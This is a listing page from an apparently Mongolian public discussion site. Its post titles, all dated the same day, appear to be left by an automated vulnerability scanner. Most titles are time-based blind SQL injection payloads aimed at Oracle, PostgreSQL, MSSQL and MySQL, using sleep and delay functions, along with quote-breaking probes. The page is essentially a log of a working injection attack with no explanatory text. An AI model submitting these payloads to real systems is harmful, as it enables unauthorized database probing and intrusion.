Хэлэлцүүлэгийн сэдэв
Санал авч байна

Нийт 128 хэлэлцүүлэг байна
2022-04-27
1
2022-04-27
1
2022-04-27
@@Z8JJ3
2022-04-27
1'"
2022-04-27
1����%2527%2522
2022-04-27
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
2022-04-27
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
2022-04-27
GP5ICcey')) OR 862=(SELECT 862 FROM PG_SLEEP(15))--
2022-04-27
SN6snvbc') OR 799=(SELECT 799 FROM PG_SLEEP(15))--
2022-04-27
1
2022-04-27
Afu6hNra' OR 944=(SELECT 944 FROM PG_SLEEP(15))--
2022-04-27
-1)) OR 921=(SELECT 921 FROM PG_SLEEP(15))--
2022-04-27
-5) OR 830=(SELECT 830 FROM PG_SLEEP(15))--
2022-04-27
-5 OR 642=(SELECT 642 FROM PG_SLEEP(15))--
2022-04-27
GwLcYS2E'; waitfor delay '0:0:15' --
2022-04-27
1 waitfor delay '0:0:15' --
2022-04-27
-1); waitfor delay '0:0:15' --
2022-04-27
-1; waitfor delay '0:0:15' --
2022-04-27
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  • 1
  • 2
  • 3
  • 4